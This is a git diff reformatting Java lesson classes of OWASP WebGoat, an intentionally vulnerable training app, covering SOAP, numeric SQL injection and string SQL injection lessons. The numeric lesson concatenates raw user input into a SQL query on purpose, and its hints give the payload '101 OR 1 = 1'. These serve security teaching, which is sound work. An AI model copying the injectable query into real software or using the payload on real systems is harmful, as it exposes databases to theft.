-	    if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) > 0)
-	    {
-		ec.addElement("<br><br>Methods Invoked:<br>");
-		ec.addElement("<ul>");
-		if (accessFirstName > 0)
+		if (s.isColor())
 		{
-		    ec.addElement("<li>getFirstName</li>");
+			t1.setBorder(1);
 		}
-		if (accessLastName > 0)
-		{
-		    ec.addElement("<li>getLastName</li>");
-		}
-		if (accessCreditCard > 0)
-		{
-		    ec.addElement("<li>getCreditCard</li>");
-		}
-		if (accessLoginCount > 0)
-		{
-		    ec.addElement("<li>getLoginCount</li>");
-		}
-		ec.addElement("</ul>");
-	    }
 
-	    A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
-	    ec.addElement(new BR());
-	    ec.addElement(a);
-}
-
-	//getLessonTracker( s ).setCompleted( SoapRequest.completed );
-	return (ec);
-    }
-
-
-    public String getResults(int id, String field)
-    {
-	try
-	{
-	    Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
-	    PreparedStatement ps = connection
-		    .prepareStatement("SELECT * FROM user_data WHERE userid = ?");
-	    ps.setInt(1, id);
-	    try
-	    {
-		ResultSet results = ps.executeQuery();
-		if ((results != null) && (results.next() == true))
-		{
-		    return results.getString(field);
-		}
-	    }
-	    catch (SQLException sqle)
-	    {}
-	}
-	catch (Exception e)
-	{}
-	return null;
-    }
-
-
-    public String getCreditCard(int id)
-    {
-	String result = getResults(id, "cc_number");
-	//SoapRequest.completed = true;
-
-	if (result != null)
-	{
-	    //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed.
-	    // This is intended to be used to determine how many methods have been accessed, not how often.
-	    accessCreditCard = 1;
-	    return result;
-	}
-	return null;
-    }
-
-
-    public String getFirstName(int id)
-    {
-	String result = getResults(id, "first_name");
-	if (result != null)
-	{
-	    //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed.
-	    // This is intended to be used to determine how many methods have been accessed, not how often.
-	    accessFirstName = 1;
-	    return result;
-	}
-	return null;
-    }
-
-
-    public String getLastName(int id)
-    {
-	String result = getResults(id, "last_name");
-	if (result != null)
-	{
-	    //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed.
-	    // This is intended to be used to determine how many methods have been accessed, not how often.
-	    accessLastName = 1;
-	    return result;
-	}
-	return null;
-    }
-
-
-    public String getLoginCount(int id)
-    {
-	String result = getResults(id, "login_count");
-	if (result != null)
-	{
-	    //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed.
-	    // This is intended to be used to determine how many methods have been accessed, not how often.
-	    accessLoginCount = 1;
-	    return result;
-	}
-	return null;
-    }
+		TR tr = new TR();
+		tr.addElement(new TD().addElement("How many operations are defined in the WSDL: "));
+		tr.addElement(new TD(new Input(Input.TEXT, "count", "")));
+		Element b = ECSFactory.makeButton("Submit");
+		tr.addElement(new TD(b).setAlign("LEFT"));
+		t1.addElement(tr);
+
+		ec.addElement(t1);
+
+		return ec;
+	}
+
+	protected Element makeTypeLine(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
+
+		if (s.isColor())
+		{
+			t1.setBorder(1);
+		}
+
+		TR tr = new TR();
+		tr.addElement(new TD()
+				.addElement("Now, what is the type of the (id) parameter in the \"getFirstNameRequest\" method: "));
+		tr.addElement(new TD(new Input(Input.TEXT, "type", "")));
+		Element b = ECSFactory.makeButton("Submit");
+		tr.addElement(new TD(b).setAlign("LEFT"));
+		t1.addElement(tr);
+
+		ec.addElement(t1);
+
+		return ec;
+	}
+
+	protected Element createContent(WebSession s)
+	{
+		return super.createStagedContent(s);
+	}
+
+	protected Element doStage1(WebSession s) throws Exception
+	{
+		return viewWsdl(s);
+	}
+
+	protected Element doStage2(WebSession s) throws Exception
+	{
+		return determineType(s);
+	}
+
+	protected Element doStage3(WebSession s) throws Exception
+	{
+		return createSoapEnvelope(s);
+	}
+
+	protected Element viewWsdl(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		// DEVNOTE: Test for stage completion.
+		try
+		{
+			int operationCount = 0;
+			operationCount = s.getParser().getIntParameter("count");
+
+			if (operationCount == 4)
+			{
+				getLessonTracker(s).setStage(2);
+				s.setMessage("Stage 1 completed.");
+
+				// Redirect user to Stage2 content.
+				ec.addElement(doStage2(s));
+			}
+			else
+			{
+				s.setMessage("Sorry, that is an incorrect count. Try Again.");
+			}
+		} catch (NumberFormatException nfe)
+		{
+			// DEVNOTE: Eat the exception.
+			// ec.addElement( new P().addElement( nfe.getMessage() ) );
+			s.setMessage("Sorry, that answer is invalid. Try again.");
+		} catch (ParameterNotFoundException pnfe)
+		{
+			// DEVNOTE: Eat the exception.
+			// ec.addElement( new P().addElement( pnfe.getMessage() ) );
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		// DEVNOTE: Conditionally display Stage1 content depending on whether stage is completed or
+		// not
+		if (getLessonTracker(s).getStage() == 1)
+		// if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) ||
+		// (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("1") )
+		{
+			ec.addElement(makeOperationsLine(s));
+
+			A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
+			ec.addElement(new P().addElement("View the following WSDL and count available operations:"));
+			ec.addElement(new BR());
+			ec.addElement(a);
+		}
+
+		// getLessonTracker( s ).setCompleted( SoapRequest.completed );
+
+		return (ec);
+	}
+
+	protected Element determineType(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		// DEVNOTE: Test for stage completion.
+		try
+		{
+			String paramType = "";
+			paramType = s.getParser().getStringParameter("type");
+
+			// if (paramType.equalsIgnoreCase("int"))
+			if (paramType.equals("int"))
+			{
+				getLessonTracker(s).setStage(3);
+				s.setMessage("Stage 2 completed. ");
+				// s.setMessage("Now, you'll craft a SOAP envelope for invoking a web service
+				// directly.");
+
+				// Redirect user to Stage2 content.
+				ec.addElement(doStage3(s));
+			}
+			else
+			{
+				s.setMessage("Sorry, that is an incorrect type. Try Again.");
+			}
+		} catch (ParameterNotFoundException pnfe)
+		{
+			// DEVNOTE: Eat the exception.
+			// ec.addElement( new P().addElement( pnfe.getMessage() ) );
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		// DEVNOTE: Conditionally display Stage2 content depending on whether stage is completed or
+		// not
+		if (getLessonTracker(s).getStage() == 2)
+		// if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) ||
+		// (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("2") )
+		{
+			ec.addElement(makeTypeLine(s));
+
+			A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
+			ec.addElement(new P().addElement("View the following WSDL and count available operations:"));
+			ec.addElement(new BR());
+			ec.addElement(a);
+		}
+
+		// getLessonTracker( s ).setCompleted( SoapRequest.completed );
+
+		return (ec);
+	}
+
+	protected Element createSoapEnvelope(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		// Determine how many methods have been accessed. User needs to check at least two methods
+		// before completing the lesson.
+		if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) >= 2)
+		{
+			/** Reset function access counters * */
+			accessFirstName = accessLastName = accessCreditCard = accessLoginCount = 0;
+			// SoapRequest.completed = true;
+			makeSuccess(s);
+		}
+		else
+		{
+
+			// display Stage2 content
+			ec
+					.addElement(new P()
+							.addElement("Intercept the request and invoke any method by sending a valid SOAP request for a valid account. <br>"));
+			Element b = ECSFactory.makeButton("Press to generate an HTTP request");
+			ec.addElement(b);
+
+			// conditionally display invoked methods
+			if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) > 0)
+			{
+				ec.addElement("<br><br>Methods Invoked:<br>");
+				ec.addElement("<ul>");
+				if (accessFirstName > 0)
+				{
+					ec.addElement("<li>getFirstName</li>");
+				}
+				if (accessLastName > 0)
+				{
+					ec.addElement("<li>getLastName</li>");
+				}
+				if (accessCreditCard > 0)
+				{
+					ec.addElement("<li>getCreditCard</li>");
+				}
+				if (accessLoginCount > 0)
+				{
+					ec.addElement("<li>getLoginCount</li>");
+				}
+				ec.addElement("</ul>");
+			}
+
+			A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
+			ec.addElement(new BR());
+			ec.addElement(a);
+		}
+
+		// getLessonTracker( s ).setCompleted( SoapRequest.completed );
+		return (ec);
+	}
+
+	public String getResults(int id, String field)
+	{
+		try
+		{
+			Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
+			PreparedStatement ps = connection.prepareStatement("SELECT * FROM user_data WHERE userid = ?");
+			ps.setInt(1, id);
+			try
+			{
+				ResultSet results = ps.executeQuery();
+				if ((results != null) && (results.next() == true)) { return results.getString(field); }
+			} catch (SQLException sqle)
+			{
+			}
+		} catch (Exception e)
+		{
+		}
+		return null;
+	}
+
+	public String getCreditCard(int id)
+	{
+		String result = getResults(id, "cc_number");
+		// SoapRequest.completed = true;
+
+		if (result != null)
+		{
+			// DEVNOTE: Always set method access counter to (1) no matter how many times it is
+			// accessed.
+			// This is intended to be used to determine how many methods have been accessed, not how
+			// often.
+			accessCreditCard = 1;
+			return result;
+		}
+		return null;
+	}
+
+	public String getFirstName(int id)
+	{
+		String result = getResults(id, "first_name");
+		if (result != null)
+		{
+			// DEVNOTE: Always set method access counter to (1) no matter how many times it is
+			// accessed.
+			// This is intended to be used to determine how many methods have been accessed, not how
+			// often.
+			accessFirstName = 1;
+			return result;
+		}
+		return null;
+	}
+
+	public String getLastName(int id)
+	{
+		String result = getResults(id, "last_name");
+		if (result != null)
+		{
+			// DEVNOTE: Always set method access counter to (1) no matter how many times it is
+			// accessed.
+			// This is intended to be used to determine how many methods have been accessed, not how
+			// often.
+			accessLastName = 1;
+			return result;
+		}
+		return null;
+	}
+
+	public String getLoginCount(int id)
+	{
+		String result = getResults(id, "login_count");
+		if (result != null)
+		{
+			// DEVNOTE: Always set method access counter to (1) no matter how many times it is
+			// accessed.
+			// This is intended to be used to determine how many methods have been accessed, not how
+			// often.
+			accessLoginCount = 1;
+			return result;
+		}
+		return null;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java
index d4d7de0f8..07ef38ac3 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -11,7 +12,6 @@ import java.util.Iterator;
 import java.util.List;
 import java.util.Map;
 import java.util.TreeMap;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.BR;
@@ -23,366 +23,329 @@ import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class SqlNumericInjection extends SequentialLessonAdapter
 {
-    private final static String STATION_ID = "station";
+	private final static String STATION_ID = "station";
 
-    private String station;
+	private String station;
 
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-
-    protected Element createContent(WebSession s)
-    {
-	return super.createStagedContent(s);
-    }
-
-
-    protected Element doStage1(WebSession s) throws Exception
-    {
-	return injectableQuery(s);
-    }
-
-
-    protected Element doStage2(WebSession s) throws Exception
-    {
-	return parameterizedQuery(s);
-    }
-
-
-    protected Element injectableQuery(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	protected Element createContent(WebSession s)
 	{
+		return super.createStagedContent(s);
+	}
 
-	    ec.addElement(makeStationList(s));
+	protected Element doStage1(WebSession s) throws Exception
+	{
+		return injectableQuery(s);
+	}
 
-	    String query;
+	protected Element doStage2(WebSession s) throws Exception
+	{
+		return parameterizedQuery(s);
+	}
 
-	    station = s.getParser().getRawParameter(STATION_ID, null);
+	protected Element injectableQuery(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
-	    if (station == null)
-	    {
-		query = "SELECT * FROM weather_data WHERE station = [station]";
-	    }
-	    else
-	    {
-		query = "SELECT * FROM weather_data WHERE station = " + station;
-	    }
+		try
+		{
 
-	    ec.addElement(new PRE(query));
+			ec.addElement(makeStationList(s));
+
+			String query;
+
+			station = s.getParser().getRawParameter(STATION_ID, null);
+
+			if (station == null)
+			{
+				query = "SELECT * FROM weather_data WHERE station = [station]";
+			}
+			else
+			{
+				query = "SELECT * FROM weather_data WHERE station = " + station;
+			}
+
+			ec.addElement(new PRE(query));
+
+			if (station == null) return ec;
+
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			try
+			{
+				Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																	ResultSet.CONCUR_READ_ONLY);
+				ResultSet results = statement.executeQuery(query);
+
+				if ((results != null) && (results.first() == true))
+				{
+					ResultSetMetaData resultsMetaData = results.getMetaData();
+					ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+					results.last();
+
+					// If they get back more than one row they succeeded
+					if (results.getRow() > 1)
+					{
+						makeSuccess(s);
+						getLessonTracker(s).setStage(2);
+						s.setMessage("Start this lesson over to attack a parameterized query.");
+					}
+				}
+				else
+				{
+					ec.addElement("No results matched.  Try Again.");
+				}
+
+			} catch (SQLException sqle)
+			{
+				ec.addElement(new P().addElement(sqle.getMessage()));
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (ec);
+	}
+
+	protected Element parameterizedQuery(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		ec.addElement("Now that you have successfully performed an SQL injection, try the same "
+				+ " type of attack on a parameterized query.");
+		// if ( s.getParser().getRawParameter( ACCT_NUM, "101" ).equals("restart"))
+		// {
+		// getLessonTracker(s).setStage(1);
+		// return( injectableQuery(s));
+		// }
+
+		ec.addElement(new BR());
+
+		try
+		{
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			ec.addElement(makeStationList(s));
+
+			String query = "SELECT * FROM weather_data WHERE station = ?";
+
+			station = s.getParser().getRawParameter(STATION_ID, null);
+
+			ec.addElement(new PRE(query));
+
+			if (station == null) return ec;
+
+			try
+			{
+				PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+																			ResultSet.CONCUR_READ_ONLY);
+				statement.setInt(1, Integer.parseInt(station));
+				ResultSet results = statement.executeQuery();
+
+				if ((results != null) && (results.first() == true))
+				{
+					ResultSetMetaData resultsMetaData = results.getMetaData();
+					ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+					results.last();
+
+					// If they get back more than one row they succeeded
+					if (results.getRow() > 1)
+					{
+						makeSuccess(s);
+					}
+				}
+				else
+				{
+					ec.addElement("No results matched.  Try Again.");
+				}
+			} catch (SQLException sqle)
+			{
+				ec.addElement(new P().addElement(sqle.getMessage()));
+			} catch (NumberFormatException npe)
+			{
+				ec.addElement(new P().addElement("Error parsing station as a number: " + npe.getMessage()));
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (ec);
+	}
+
+	protected Element makeStationList(WebSession s) throws SQLException, ClassNotFoundException
+	{
+		ElementContainer ec = new ElementContainer();
+
+		ec.addElement(new P().addElement("Select your local weather station: "));
+
+		Map stations = getStations(s);
+		Select select = new Select(STATION_ID);
+		Iterator it = stations.keySet().iterator();
+		while (it.hasNext())
+		{
+			String key = (String) it.next();
+			select.addElement(new Option(key).addElement((String) stations.get(key)));
+		}
+		ec.addElement(select);
+		ec.addElement(new P());
+
+		Element b = ECSFactory.makeButton("Go!");
+		ec.addElement(b);
 
-	    if (station == null)
 		return ec;
+	}
+
+	/**
+	 * Gets the stations from the db
+	 * 
+	 * @return A map containing each station, indexed by station number
+	 */
+	protected Map getStations(WebSession s) throws SQLException, ClassNotFoundException
+	{
 
 		Connection connection = DatabaseUtilities.getConnection(s);
 
-	    try
-	    {
-		Statement statement = connection.createStatement(
-			ResultSet.TYPE_SCROLL_INSENSITIVE,
-			ResultSet.CONCUR_READ_ONLY);
-		ResultSet results = statement.executeQuery(query);
+		Map<String, String> stations = new TreeMap<String, String>();
+		String query = "SELECT DISTINCT station, name FROM WEATHER_DATA";
 
-		if ((results != null) && (results.first() == true))
+		try
 		{
-		    ResultSetMetaData resultsMetaData = results.getMetaData();
-		    ec.addElement(DatabaseUtilities.writeTable(results,
-			    resultsMetaData));
-		    results.last();
+			Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																ResultSet.CONCUR_READ_ONLY);
+			ResultSet results = statement.executeQuery(query);
 
-		    // If they get back more than one row they succeeded
-		    if (results.getRow() > 1)
-		    {
-			makeSuccess(s);
-			getLessonTracker(s).setStage(2);
-			s
-				.setMessage("Start this lesson over to attack a parameterized query.");
-		    }
-		}
-		else
+			if ((results != null) && (results.first() == true))
+			{
+				results.beforeFirst();
+
+				while (results.next())
+				{
+					String station = results.getString("station");
+					String name = results.getString("name");
+
+					// <START_OMIT_SOURCE>
+					if (!station.equals("10001") && !station.equals("11001"))
+					{
+						stations.put(station, name);
+					}
+					// <END_OMIT_SOURCE>
+				}
+
+				results.close();
+			}
+		} catch (SQLException sqle)
 		{
-		    ec.addElement("No results matched.  Try Again.");
+			sqle.printStackTrace();
 		}
 
-	    }
-	    catch (SQLException sqle)
-	    {
-		ec.addElement(new P().addElement(sqle.getMessage()));
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return stations;
 	}
 
-	return (ec);
-    }
-
-
-    protected Element parameterizedQuery(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	ec
-		.addElement("Now that you have successfully performed an SQL injection, try the same "
-			+ " type of attack on a parameterized query.");
-	//		if ( s.getParser().getRawParameter( ACCT_NUM, "101" ).equals("restart"))
-	//		{
-	//			getLessonTracker(s).setStage(1);
-	//			return( injectableQuery(s));
-	//		}
-
-	ec.addElement(new BR());
-
-	try
+	/**
+	 * Gets the category attribute of the SqNumericInjection object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
 	{
-		Connection connection = DatabaseUtilities.getConnection(s);
+		return Category.INJECTION;
+	}
 
-	    ec.addElement(makeStationList(s));
+	/**
+	 * Gets the hints attribute of the DatabaseFieldScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
+		hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+				+ "\"SELECT * FROM weather_data WHERE station = \" + station ");
+		hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
+				+ "Try appending a SQL statement that always resolves to true.");
+		hints.add("Try entering [ 101 OR 1 = 1 ].");
 
-	    String query = "SELECT * FROM weather_data WHERE station = ?";
+		return hints;
+	}
 
-	    station = s.getParser().getRawParameter(STATION_ID, null);
+	private final static Integer DEFAULT_RANKING = new Integer(70);
 
-	    ec.addElement(new PRE(query));
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-	    if (station == null)
-		return ec;
+	/**
+	 * Gets the title attribute of the DatabaseFieldScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Numeric SQL Injection");
+	}
 
-	    try
-	    {
-		PreparedStatement statement = connection.prepareStatement(
-			query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-			ResultSet.CONCUR_READ_ONLY);
-		statement.setInt(1, Integer.parseInt(station));
-		ResultSet results = statement.executeQuery();
-
-		if ((results != null) && (results.first() == true))
+	/**
+	 * Constructor for the DatabaseFieldScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public void handleRequest(WebSession s)
+	{
+		try
 		{
-		    ResultSetMetaData resultsMetaData = results.getMetaData();
-		    ec.addElement(DatabaseUtilities.writeTable(results,
-			    resultsMetaData));
-		    results.last();
-
-		    // If they get back more than one row they succeeded
-		    if (results.getRow() > 1)
-		    {
-			makeSuccess(s);
-		    }
-		}
-		else
+			super.handleRequest(s);
+		} catch (Exception e)
 		{
-		    ec.addElement("No results matched.  Try Again.");
+			System.out.println("Exception caught: " + e);
+			e.printStackTrace(System.out);
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		ec.addElement(new P().addElement(sqle.getMessage()));
-	    }
-	    catch (NumberFormatException npe)
-	    {
-		ec.addElement(new P()
-			.addElement("Error parsing station as a number: "
-				+ npe.getMessage()));
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
 	}
 
-	return (ec);
-    }
-
-
-    protected Element makeStationList(WebSession s) throws SQLException,
-	    ClassNotFoundException
-    {
-	ElementContainer ec = new ElementContainer();
-
-	ec
-		.addElement(new P()
-			.addElement("Select your local weather station: "));
-
-	Map stations = getStations(s);
-	Select select = new Select(STATION_ID);
-	Iterator it = stations.keySet().iterator();
-	while (it.hasNext())
-	{
-	    String key = (String) it.next();
-	    select.addElement(new Option(key).addElement((String) stations
-		    .get(key)));
-	}
-	ec.addElement(select);
-	ec.addElement(new P());
-
-	Element b = ECSFactory.makeButton("Go!");
-	ec.addElement(b);
-
-	return ec;
-    }
-
-
-    /**
-     *  Gets the stations from the db
-     *
-     * @return    A map containing each station, indexed by station number
-     */
-    protected Map getStations(WebSession s) throws SQLException,
-	    ClassNotFoundException
-    {
-
-    Connection connection = DatabaseUtilities.getConnection(s);
-
-	Map<String, String> stations = new TreeMap<String, String>();
-	String query = "SELECT DISTINCT station, name FROM WEATHER_DATA";
-
-	try
-	{
-	    Statement statement = connection.createStatement(
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    ResultSet results = statement.executeQuery(query);
-
-	    if ((results != null) && (results.first() == true))
-	    {
-		results.beforeFirst();
-
-		while (results.next())
-		{
-		    String station = results.getString("station");
-		    String name = results.getString("name");
-
-		    //<START_OMIT_SOURCE>
-		    if (!station.equals("10001") && !station.equals("11001"))
-		    {
-			stations.put(station, name);
-		    }
-		    //<END_OMIT_SOURCE>
-		}
-
-		results.close();
-	    }
-	}
-	catch (SQLException sqle)
-	{
-	    sqle.printStackTrace();
-	}
-
-	return stations;
-    }
-
-
-    /**
-     *  Gets the category attribute of the SqNumericInjection object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.INJECTION;
-    }
-
-
-    /**
-     *  Gets the hints attribute of the DatabaseFieldScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
-	hints
-		.add("This is the code for the query being built and issued by WebGoat:<br><br> "
-			+ "\"SELECT * FROM weather_data WHERE station = \" + station ");
-	hints
-		.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
-			+ "Try appending a SQL statement that always resolves to true.");
-	hints.add("Try entering [ 101 OR 1 = 1 ].");
-
-	return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(70);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the DatabaseFieldScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Numeric SQL Injection");
-    }
-
-
-    /**
-     *  Constructor for the DatabaseFieldScreen object
-     *
-     * @param  s  Description of the Parameter
-     */
-    public void handleRequest(WebSession s)
-    {
-	try
-	{
-	    super.handleRequest(s);
-	}
-	catch (Exception e)
-	{
-	    System.out.println("Exception caught: " + e);
-	    e.printStackTrace(System.out);
-	}
-    }
-    
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java
index 06a944cbf..3dd1fd325 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -8,7 +9,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.BR;
@@ -19,290 +19,263 @@ import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class SqlStringInjection extends SequentialLessonAdapter
 {
-    private final static String ACCT_NAME = "account_name";
+	private final static String ACCT_NAME = "account_name";
 
-    private static String STAGE = "stage";
+	private static String STAGE = "stage";
 
-    private String accountName;
+	private String accountName;
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	return super.createStagedContent(s);
-    }
-
-
-    protected Element doStage1(WebSession s) throws Exception
-    {
-	return injectableQuery(s);
-    }
-
-
-    protected Element doStage2(WebSession s) throws Exception
-    {
-	return parameterizedQuery(s);
-    }
-
-
-    protected Element injectableQuery(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
